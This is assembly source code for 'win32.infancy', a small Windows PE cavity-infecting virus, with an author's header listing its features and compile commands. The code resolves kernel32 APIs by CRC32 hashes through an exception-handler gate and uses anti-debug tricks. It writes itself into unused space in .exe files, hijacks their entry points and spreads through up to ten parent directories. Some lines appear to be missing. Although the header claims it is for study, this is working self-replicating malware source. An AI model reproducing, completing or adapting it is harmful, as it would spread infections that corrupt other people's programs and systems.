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566 lines
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;? win32.infancy (c)oded by shitdown [mions] in feb-18-2001, alfa version ?
;? non-dangerous, non-resident pe cavity ring3 direct-action infector ?
;? this code is optimised for size by technique, not by asm :( ?
;? description:? ?
;??????????????? ?
;? name : win32.infancy (win32 teoretically, tested on win98 :-) ?
;? author : shitdown (http://shitdown.sf.cz, email: shitdown@sf.cz) ?
;? origin : czech republic ?
;? size : 540 bytes ?
;? infects : .exe pe files ?
;? payload : no ?
;? strings : no ?
;? encrypt : no ?
;? resident : no ?
;? cavity : yes ?
;? anti-debug : yes, 0cch api callgate fucks td32 ?
;? anti-emu : yes,non-standard playing with seh ?
;? anti-av : no ?
;? simple example tiny virus, shows how to use ?
;? structured exception handling ?
;? kernel is determined by standard way (pop eax/push eax) ?
;? at start, apis is located at fly (when is needed) ?
;? ( push crc32 of api / int 3 ) - crc32 api names, ?
;? virus can be easy detected / cleaned by generic scaner ?
;? virus doesn't needs write permission to section - ?
;? - all variables will be allocated dynamically on stack ?
;? virus searches & infects all files in 10 up-directories; ?
;? (cd .. / infect_all, cd .. / infect_all :) ?
;? this cute code is designed to use 'holes' in code ?
;? section, virus doesn't increase host size. ?
;? this code is not purposed to be world-wide :) ?
;? so, only for study purposes. ?
;? ?
;?how to compile: ?
;? tasm32 -ml -m9 -q -zn -z infancy.asm ?
;? tlink32 -r -m -s -M -Tpe -c -ap infancy.obj ?
;?how to debug: ?
;? set 'softice' definition to '1', compile, go to softice and type ?
;?'i1here on' and run infancy.exe file. ?
;???????????????????????????????? ?
;?fuck the windows, linux rocks!? ?
.386p ;nice machines :)
.model flat ;why ? why not !
softice = 0
dir_depth = 10 ;10 up-directories
dummy dd ?
; ?????????????????
;??????????????????????????? needed macroz ???????????????????????????????????
; ?????????????????
;? crc32 macro ?
crc32_magic = 0c1a7f39ah
crc32 macro string
crcreg = 0ffffffffh
irpc _x, <string>
ctrlbyte = ('&_x&' and 0dfh) xor (crcreg and 0ffh)
crcreg = crcreg shr 8
rept 8
ctrlbyte = (ctrlbyte shr 1) xor (crc32_magic * (ctrlbyte and 1))
crcreg = crcreg xor ctrlbyte
dd crcreg
;? api call macro ?
api macro apiname
db 68h
crc32 <apiname>
db 0cch
;? softice breakpoint macro ?
break macro
if softice
int 01
; ????????????????????????????
;???????????????????????? here starts code section ???????????????????????????
; ????????????????????????????
;? try to get kernel address, using 'standard' method ?
;? pop eax / push eax, function is protected by seh ?
pop eax ;kernel address
push eax ;to eax
xor ax, ax
push eax ;for restorin'
;by seh
call set_k32_scan_seh
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
pop ecx ;remove old seh
pop ecx
pop eax ;restore last
;kernel address
add eax, 0-10000h
jmp short k32_scan_next ;try again
xor ecx, ecx
push ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne short k32_scan_mismatch
pop eax ;remove old seh
pop ecx
pop ebp
;?????????????????????? create handler for virus-services ?????????????????????
call get_handler_offset
;? here is an entrypoint of exception gate, if any exception occurs ?
;? (including 0cch opcode call), this code will be executed ?
pushad ;save all registerz
mov esi, [esp+4+20h] ;exception code
lodsb ;exception number
cmp al, 3 ;virus request ?
je short exception_virus_request ;yah
;? only handled exception is int 0x3 - virus api gateway, other ?
;? exceptions is page faults, invalid opcodes etc, then virus ?
;? tryes jump to original host ?
mov esp, [esp+8+20h]
pop eax ;remove old seh handler
pop eax
call get_eip
db 81h, 2ch, 24h ;sub [esp], old_host
old_host dd -((offset fake_host-offset go)-(offset get_eip-offset go))
;??? virus interrupt / request
mov esi, [esp+0ch+20h] ;context-block
add esi, 0b4h ;pointer
lodsd ;to saved ebp
xchg eax, ebp ;ebp-base of kernel
mov edi, esi ;for edi storing
lodsd ;load eip to eax
xchg eax, esi ;in esi is eip
;??? fix win9x bug
cmp al, 0cch
je short no_w9x_bug
dec esi
;? in esi is return addres (after int 03h) ?
;? in edi is pointer to stack stored eip ?
mov ebx, [edi+12] ;esi points to dword on stack
xchg [ebx], esi ;xchange crc32 <> return addr
mov ebx, esi ; :( crc32 to ebx
;? okay, now i must call those crazy api ?
;? in ebp is kernel address ?
mov esi, [ebp+3ch] ;pe header to esi
mov esi, [esi+ebp+78h] ;export table to esi
lea esi, [esi+ebp+1ch] ;offset of 'address table'
lodsd ;address table
push eax ;save 'address table'
lodsd ;name table to eax
push esi ;save pointer to ordinal table
lea esi, [eax+ebp]
mov ecx, ebp ;counter of api
lodsd ;in eax pointer to string
add eax, ebp
;???? crc32 code ?????????????????????????????????????????????????????????????
;? ? input: eax - offset to name ? ?
; ? output:edx - crc32 ?
; ???????????????????????????????
push esi
xchg eax, esi
xor edx, edx
dec edx
and al, 0dfh ;i hate uppercase :)
jz short crc_finish
xor dl, al
mov al, 08h
shr edx, 01h
jnc short crc_no_change
xor edx, crc32_magic
dec al
jnz short crc_next_bit
jmp short crc_next_byte
pop esi
;? ?
;?????????????????????????????? end of crc32 ?????????????????????????????????
inc ecx
inc ecx
cmp edx, ebx ;hit ?
jne short try_next_api_name
;? yahooo, api hit! ?
;? in ecx is api index (starting from 1 !!) ?
pop esi ;restore *ordinal_table
lodsd ;in eax pointer to ordinal table
movzx ecx, word ptr [eax+ecx-2] ;in ecx is now ordinal (0..x)
pop eax ;in esi is ptr address table
add eax, ebp
mov eax, [ecx*4+eax] ;and jump to api :)
add eax, ebp
xor eax, eax
;? ?
;???????????????????????????? end of virus-handler ???????????????????????????
;????????????????????????? here starts infection engine ??????????????????????
;? ?
xor esi, esi
lea ebx, [esp+44+2*4] ;filename to ebx
;??? at first, i must open file for read & write
push esi ;file attributes
push esi ;""
push 3 ;open existing
push esi ;security=default
push esi ;no sharing
push 0c0000000h ;generic read & write
push ebx ;file name
api <createfilea> ;open!
inc eax ;-1+1=0 ?
jnz short infect_continue
infect_continue: ; yes, this is error
dec eax ; handle to eax
push eax ;save for future use
;??? now create file mapping
push esi ;no filename handle
push dword ptr [esp+32+4*4] ;maximal size of file
push esi ;no min. size
push 4 ;page read & write
push esi ;no security
push eax ;mapped file handle
api <createfilemappinga>
push eax ;save for future use
;??? and map file to memory
push dword ptr [esp+32+4*4] ;count of bytes to map
push esi ;blah...
push esi ;
push 2 ;read & write
push eax ;map-handle
api <mapviewoffile>
;??? yahoo, in eax is mapped file
mov ebx, eax
cmp word ptr [eax], 5a4dh ;exe file ?
jne short @unmap_file
cmp word ptr [eax+18h], 0040h
jne short @@unmap_file
add ebx, [eax+3ch]
cmp word ptr [ebx], 4550h ;is this pe header ?
@@unmap_file: jne short unmap_file ;no
xchg edx, eax ;imagebase to edx
push ebx ;save pe header
movzx eax, word ptr [ebx+14h]
add ebx, eax
test byte ptr [ebx+18h+24h], 20h ;executable ?
jz short _unmap_file ;no :(
;??? okay, in ebx+18h is section record
mov ecx, dword ptr [ebx+18h+10h] ;raw_size
cmp ecx, dword ptr [ebx+18h+08h] ;raw_size>virtual size ?
jc short _unmap_file ;raw size too small, go away
mov esi, [ebx+18h+14h] ;raw address of section in esi
add esi, edx ;esi points to start of .code
mov eax, [ebx+18h+0ch] ;relative virt. addr to eax
;? esi - pointer to code, ecx - count of bytes left, edi - counter ?
;? eax - offset of cave (rva) ?
;???? current stack dump ????????????????????»
;? [esp] ? memory mapped pe header ?
;? [esp+4] ? map handle ?
;? [esp+8] ? file handle ?
;? [esp+12] ? offset of after_infect: label ?
;? [esp+16] ? file search handle ?
;? [esp+20] ? start of win32_find_data ?
;? [esp+48] ? 100% null-filled 4bytes :)) ?
; push dword ptr [ebx+0ch+18h] ;save virtual addr
; mov dword ptr [esp+20], [ebx+0ch+18h]
xor edi, edi
add [esp+48], edi
add esi, edi
xor edi, edi
push esi ;save address
dec ecx
pop eax ;clean stack
js short _unmap_file
push eax
inc edi ;counter of found bytes
test al, al
jz short holes_search
cmp al, 0cch
jz short holes_search
cmp al, 0c3h
jz short holes_search
db 66h, 81h, 0ffh ;cmp di, virus_size
dw virus_size+4
pop esi ;restore saved address
jc short hole_mismatch ;no :(
;? yah, in stack is rva of cave, in esi cave address ?
;? in edi size of cave ?
; push dword ptr [ebx+18h+10h] ;raw size
; pop dword ptr [ebx+18h+08h] ;=virtual size
mov edi, esi ;in edi offset of cave
mov esi, [esp+12] ;offset infect to esi
sub esi, offset after_infect - offset go ;offset of go to esi
; push esi
mov ecx, virus_size ;virus size to ecx
rep movsb ;and move the virus !!
; pop esi ;in esi offset of infect:
;??? in edi is offset virus_end
sub edi, virus_end-old_host
mov ecx, [esp+48] ;addres relative to cave
lea ecx, [ecx+4]
add ecx, [ebx+0ch+18h] ;rva of section
pop ebx ;pe header in ebx
lea eax, [ecx+get_eip-go]
xchg [ebx+28h], ecx ;set entrypoint to virus
sub eax, ecx
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
stosd ;and store return adress
push eax
xchg edx, eax
pop ecx ;remove shit (pe header)
;unmaps file, in eax must be address of mapped file
push eax
api <unmapviewoffile>
db 0bbh ;mov ebx, crc32 <closehandle>
crc32 <closehandle>
push ebx
db 0cch ;close mapping handle
pop edi
lea esi, [esp+20+2*4]
push esi
sub esi, 8
push esi
sub esi, 8
push esi
push edi
api <setfiletime>
push edi
push ebx
db 0cch ;close file handle
push 21h ;make file read-only
add esi, 40h
push esi
api <setfileattributesa>
;? old_host = rva_of_virus+(offset get_eip-offset go)-entrypoint_rva ?
;?????????????????????????? here ends infection engine ???????????????????????
;--- setup handler for virus services / exeption handling
push eax
mov dword ptr fs:[eax], esp
push dir_depth
mov ah, 2 ;512
sub esp, eax ;place for old directory
push esp ;buffer offset
push eax ;buffer len
xchg eax, ebx
api <getcurrentdirectorya>
;? main infection routine: ?
;? searches for *.exe and for ..\*.exe and infect them ?
sub esp, ebx ;size of (ffdata)
push esp ;offset of data buffer
call get_mask
db "*.exe", 0
api <findfirstfilea>
push eax ;save search handle
call infect
pop esi
push esp
push esi
api <findnextfilea>
dec eax
xchg eax, esi
jz short dir_search
push eax
api <findclose> ;close search handle
mov dword ptr [esp], '..'
push esp
db 0bbh
crc32 <setcurrentdirectorya>
push ebx
db 0cch
; api <setcurrentdirectorya> ;go to next up directory
dec dword ptr [esp+1024]
jnz short find_first
cdq ;edx=0
mov dh, 2
add esp, edx
push esp
push ebx
db 0cch
; api <setcurrentdirectorya>
int 4
virus_size = $-virus_start
;?end of virus game?
; ??????????????????
;??????????????????????????????? fake host part ??????????????????????????????
; ??????????????????
db "win32.infancy."
db '0'+virus_size/100 mod 10
db '0'+virus_size/10 mod 10
db '0'+virus_size mod 10
db 13, 10, "(c)oded by shitdown in jul-2000, http://shitdown@sf.cz, shitdown@sf.cz", 13, 10
db "welcome to first generation!", 13, 10
msg_len = $-msg
db 1024 dup(?)
;--------------- same kernel scanner
pop eax ;kernel address to eax
push eax
xor ax, ax
push eax ;for restorin' by seh
call _set_k32_scan_seh
pop ecx ;esp+8
pop ecx
pop esp ;mov esp, [esp+8]
pop eax ;restore last kernel address
pop ecx ;remove old seh
pop ecx
add eax, 0-10000h
jmp short _k32_scan_next ;try again
push eax
xor ecx, ecx
mov dword ptr fs:[ecx], esp
cmp word ptr [eax], 5a4dh
jne _k32_scan_mismatch
pop ebp ;eax
pop eax ;remove old seh
pop eax
xor ecx, ecx
push offset exception_handler
push ecx
mov dword ptr fs:[0], esp
push -11 ;get a standard handle
api <getstdhandle>
push 0
push offset dummy
push msg_len
push offset msg
push eax
api <writefile>
push 0
api <exitprocess>
end go
;heh, thats all